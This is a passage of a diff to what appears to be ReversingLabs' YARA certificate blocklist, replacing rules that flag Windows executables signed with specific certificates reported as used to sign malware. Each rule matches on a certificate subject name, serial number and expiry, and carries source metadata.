 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b0e4057f-a0e7-5e2e-a47f-dc8188b6b506"
+		id = "689c1f80-3b3c-5bd7-9129-4f508cad7fb4"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11254-L11270"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9b6fb002d603135391958668be0ef805e441928a035c9c4da4bb9915aa3086e8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4160-L4176"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2e464f4e9bfe0c9510a78552acffb241d2435ea9bf3f5f2501353d7f8f280d78"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14551,21 +39216,21 @@ rule REVERSINGLABS_Cert_Blocklist_64C2505C7306639Fc8Eae544B0305338 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MANILA Solution as" and pe.signatures [ i ] . serial == "64:c2:50:5c:73:06:63:9f:c8:ea:e5:44:b0:30:53:38" and 1609418043 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KBK, OOO" and pe.signatures [ i ] . serial == "4b:47:d1:8d:be:a5:7a:bd:15:63:dd:f8:9f:87:a6:c2" and 1590485607 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2F96A89Bfec6E44Dd224E8Fd7E72D9Bb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Be41E2C7Bb2493044B9241Abb732599D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bdca8435-c1fd-598d-bd82-20a3a3b2a959"
+		id = "81e5a8f3-0893-534a-ab4f-5c2c47078b40"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11272-L11288"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c0c8e5c0e2e120ee6b055e9a6b2af3d424bed0832c2619beab658fe01757f69f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4178-L4196"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "eb5d94b80fd030d14dc26878895c61761825f3c77209ca0280e88dcd1800f9c2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14575,21 +39240,21 @@ rule REVERSINGLABS_Cert_Blocklist_2F96A89Bfec6E44Dd224E8Fd7E72D9Bb : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and pe.signatures [ i ] . serial == "2f:96:a8:9b:fe:c6:e4:4d:d2:24:e8:fd:7e:72:d9:bb" and 1625529600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Company Babylon" and ( pe.signatures [ i ] . serial == "00:be:41:e2:c7:bb:24:93:04:4b:92:41:ab:b7:32:59:9d" or pe.signatures [ i ] . serial == "be:41:e2:c7:bb:24:93:04:4b:92:41:ab:b7:32:59:9d" ) and 1589146251 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B649A966410F62999C939384Af553919 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_15C5Af15Afecf1C900Cbab0Ca9165629 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "03533c22-eb16-546c-af55-675af9c833ce"
+		id = "de734943-e735-5895-b76e-5f8588a77540"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11290-L11308"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "623a2f931198eacf44fd233065e96a4dcadb5b3bbc7ca56df2b6ae9eafc4faa5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4198-L4214"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5c54f32dbac271b2b60ec40bd052b5566a512cd2bcb4255057b21262806882d2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14599,21 +39264,21 @@ rule REVERSINGLABS_Cert_Blocklist_B649A966410F62999C939384Af553919 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F.A.T. SARL" and ( pe.signatures [ i ] . serial == "00:b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19" or pe.signatures [ i ] . serial == "b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19" ) and 1590537600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kompaniya Auttek" and pe.signatures [ i ] . serial == "15:c5:af:15:af:ec:f1:c9:00:cb:ab:0c:a9:16:56:29" and 1586091840 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_45245Eef53Fcf38169C715Cf68F44452 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_476De2F108D20B43Ba3Bae6F331Af8F1 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "514eac5a-9264-58ef-b4ee-65ec24b43e5a"
+		id = "5a741e6d-9b58-5536-8987-b3c36cdfcd5f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11310-L11326"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7e0c3147e657802e457f6df271b7f5a64c81fd13f936a8935aa991022e4ab238"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4216-L4232"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e5edf3e15b2139ba6cd85f2cfea63b53f7fa36a3fd7224a4a9ccbe5de6eb6f1d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14623,21 +39288,21 @@ rule REVERSINGLABS_Cert_Blocklist_45245Eef53Fcf38169C715Cf68F44452 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PAPER AND CORE SUPPLIES LTD" and pe.signatures [ i ] . serial == "45:24:5e:ef:53:fc:f3:81:69:c7:15:cf:68:f4:44:52" and 1639958400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digiwill Limited" and pe.signatures [ i ] . serial == "47:6d:e2:f1:08:d2:0b:43:ba:3b:ae:6f:33:1a:f8:f1" and 1588135722 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1895433Ee9E2Bd48619D75132262616F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_08Ddcc67F8Cad6929607E4Cda29B3503 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d7bf59df-708c-5260-bc98-1a86b2c9c988"
+		id = "3563547f-556b-56e3-ad25-cfec0294fe93"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11328-L11344"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f00a29ff5dddae40225ab62cb2d4b9dec1539ad58c8cd27d686480eecdb3e31d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4234-L4250"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4cd975312ca825b51f34f5c89184a56526877436224c1e7407d715b28ebfd9d5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14647,21 +39312,21 @@ rule REVERSINGLABS_Cert_Blocklist_1895433Ee9E2Bd48619D75132262616F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Evetrans Ltd" and pe.signatures [ i ] . serial == "18:95:43:3e:e9:e2:bd:48:61:9d:75:13:22:62:61:6f" and 1619789516 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FAN-CHAI, TOV" and pe.signatures [ i ] . serial == "08:dd:cc:67:f8:ca:d6:92:96:07:e4:cd:a2:9b:35:03" and 1564310268 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Ffc9825644Caf5B1F521780C5C7F42C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_052242Ace583Adf2A3B96Adcb04D0812 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3d806d90-e029-5521-b191-6967e2691c0f"
+		id = "22104929-e2c5-565c-975c-826f666e78e2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11346-L11362"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1a9263c809f5633d01d4d4d0091c8dc214bad73af0eff3c9a94b33bca513f26d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4252-L4268"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e1593a2bf375912e411d5f19d9e232c6b87f0897bb6f1c0b0539380b34b05af5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14671,21 +39336,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Ffc9825644Caf5B1F521780C5C7F42C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIVUS LIMITED" and pe.signatures [ i ] . serial == "1f:fc:98:25:64:4c:af:5b:1f:52:17:80:c5:c7:f4:2c" and 1615507200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FAN-CHAI, TOV" and pe.signatures [ i ] . serial == "05:22:42:ac:e5:83:ad:f2:a3:b9:6a:dc:b0:4d:08:12" and 1573603200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_8D52Fb12A2511E86Bbb0Ba75C517Eab0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Bebef5C533Ce92Efc402Fab8605C43Ec : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1bc9d36c-381e-5359-bba4-8dd870ed9267"
+		id = "59d3dd01-47bc-59ee-8fe7-fd5b1af8f9f4"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11364-L11382"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "023830ab3d71ed8ecf8f0e271c56dc267dcd000f5ff156c70d31089cd7010da8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4270-L4288"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "daa57ad622799467c60693060e6c9eea18bdf0bb26f178e8b03453aab486ccf4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14695,21 +39360,21 @@ rule REVERSINGLABS_Cert_Blocklist_8D52Fb12A2511E86Bbb0Ba75C517Eab0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VThink Software Consulting Inc." and ( pe.signatures [ i ] . serial == "00:8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0" or pe.signatures [ i ] . serial == "8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0" ) and 1599177600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO VEKTOR" and ( pe.signatures [ i ] . serial == "00:be:be:f5:c5:33:ce:92:ef:c4:02:fa:b8:60:5c:43:ec" or pe.signatures [ i ] . serial == "be:be:f5:c5:33:ce:92:ef:c4:02:fa:b8:60:5c:43:ec" ) and 1587513600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_332Bd5801E8415585E72C87E0E2Ec71D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1D3F39F481Fe067F8A9289Bb49E05A04 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d251afda-7582-5a00-a100-fd3acff2f995"
+		id = "0c4b6efb-c793-5505-bcd6-f62266c984c6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11384-L11400"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3648c3a8dbcdbd24746b9fa8cb3071d5f5019e5917848d88437158c6cb165445"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4290-L4306"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2fdf8b59d302d2ce81a1e9a5715138adc1ec45bd86871c4c2e46412407e329f9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14719,21 +39384,21 @@ rule REVERSINGLABS_Cert_Blocklist_332Bd5801E8415585E72C87E0E2Ec71D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Marketing Strategies, Inc." and pe.signatures [ i ] . serial == "33:2b:d5:80:1e:84:15:58:5e:72:c8:7e:0e:2e:c7:1d" and 1662616824 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LOGIKA, OOO" and pe.signatures [ i ] . serial == "1d:3f:39:f4:81:fe:06:7f:8a:92:89:bb:49:e0:5a:04" and 1592553220 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E3B80C0932B52A708477939B0D32186F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Be35D025E65Cc7A4Ee01F72 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e7cdf040-3fe2-55ed-8f66-702fb4455653"
+		id = "533bcad1-b589-5a05-8f35-32fcb79c7f68"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11402-L11420"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "acdfce4dc25cbc9e9817453d5cf56c7d319bebdf7a039ea47412ec3b2f68cb02"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4308-L4324"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "dad7ab834a67d36c0b63e45922aea566dc0aaf922be2b74161616b3caea83fdc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14743,21 +39408,21 @@ rule REVERSINGLABS_Cert_Blocklist_E3B80C0932B52A708477939B0D32186F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BISOYETUTU LTD LIMITED" and ( pe.signatures [ i ] . serial == "00:e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" or pe.signatures [ i ] . serial == "e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" ) and 1617062400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logika OOO" and pe.signatures [ i ] . serial == "7b:e3:5d:02:5e:65:cc:7a:4e:e0:1f:72" and 1594976445 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C79F817F082986Bef3209F6723C8Da97 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_351Fe2Efdc0Ac56A0C822Cf8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b3978831-57d6-5f25-a271-fa4f449d37b3"
+		id = "ac6b7c6d-781b-5c91-80fe-b822ee00ea7f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11422-L11440"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a5960f4c2ed768ccc5779d3754f51463c7b14a3a887c690944add23fba464f1a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4326-L4342"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "46b87c3531e01ba150f056ec3270564426363ef8c58256eeedbcab247c7625e4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14767,21 +39432,21 @@ rule REVERSINGLABS_Cert_Blocklist_C79F817F082986Bef3209F6723C8Da97 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Al-Faris group d.o.o." and ( pe.signatures [ i ] . serial == "00:c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97" or pe.signatures [ i ] . serial == "c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97" ) and 1616371200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logika OOO" and pe.signatures [ i ] . serial == "35:1f:e2:ef:dc:0a:c5:6a:0c:82:2c:f8" and 1594976475 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1E5Efa53A14599Cc82F56F0790E20B17 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9Cfbb4C69008821Aaacecde97Ee149Ab : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f87dac0c-4b46-5b30-a715-f21e7c3a98e0"
+		id = "a8ba633b-fbbe-51ca-9f67-fb91ce9ac2f7"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11442-L11458"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "78cbfeb5d7b58029a5b4107f2a59e892ff9d71788cf74e88ac823cb85ba35a94"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4344-L4362"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d74b13eeb5d0a57c5dd3257480230c504a68a8422e77a46bb2e101abb2c7f282"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14791,21 +39456,21 @@ rule REVERSINGLABS_Cert_Blocklist_1E5Efa53A14599Cc82F56F0790E20B17 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Storeks LLC" and pe.signatures [ i ] . serial == "1e:5e:fa:53:a1:45:99:cc:82:f5:6f:07:90:e2:0b:17" and 1623196800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kivaliz Prest s.r.l." and ( pe.signatures [ i ] . serial == "00:9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab" or pe.signatures [ i ] . serial == "9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab" ) and 1592363914 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Cf2D0B5Bfdd68Cf777A0C12F806A569 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C04F5D17Af872Cb2C37E3367Fe761D0D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2900c6ae-9e61-5bad-a7b4-b8eca925a1ea"
+		id = "d7ef2bdf-afba-5254-bef2-78f4b6d5ecea"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11460-L11476"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4d8fd52cd12f9512c0b148f9915860152f108884d29617a5fbfd62500d3a14c4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4364-L4382"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4a4d60aa3722a710fe23d5e11c55a28bfe721bb4e797b041d58f62a994487799"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14815,21 +39480,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Cf2D0B5Bfdd68Cf777A0C12F806A569 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROTIP d.o.o. - v ste\\xC4\\x8Daju" and pe.signatures [ i ] . serial == "0c:f2:d0:b5:bf:dd:68:cf:77:7a:0c:12:f8:06:a5:69" and 1611705600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DES SP Z O O" and ( pe.signatures [ i ] . serial == "00:c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" or pe.signatures [ i ] . serial == "c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" ) and 1594590024 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_F675139Ea68B897A865A98F8E4611F00 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_02C5351936Abe405Ac760228A40387E8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3bac20a3-1415-53af-9d04-a30aa7488dd7"
+		id = "6a1e5115-ac72-57a3-8418-7c81f38f76af"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11478-L11496"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2306e90d376f5de8a4eb6d4a696bc1781686d7094cb0a2db48019ee93c1bf60a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4384-L4400"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5a990f8d1a3f467cdafa0f625bc162745d9201e15ce43fdc93cd6b1730572e89"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14839,21 +39504,21 @@ rule REVERSINGLABS_Cert_Blocklist_F675139Ea68B897A865A98F8E4611F00 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BS TEHNIK d.o.o." and ( pe.signatures [ i ] . serial == "00:f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00" or pe.signatures [ i ] . serial == "f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00" ) and 1606953600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RESURS-RM OOO" and pe.signatures [ i ] . serial == "02:c5:35:19:36:ab:e4:05:ac:76:02:28:a4:03:87:e8" and 1589932801 <= pe.signatures [ i ] . not_after )
 }
 
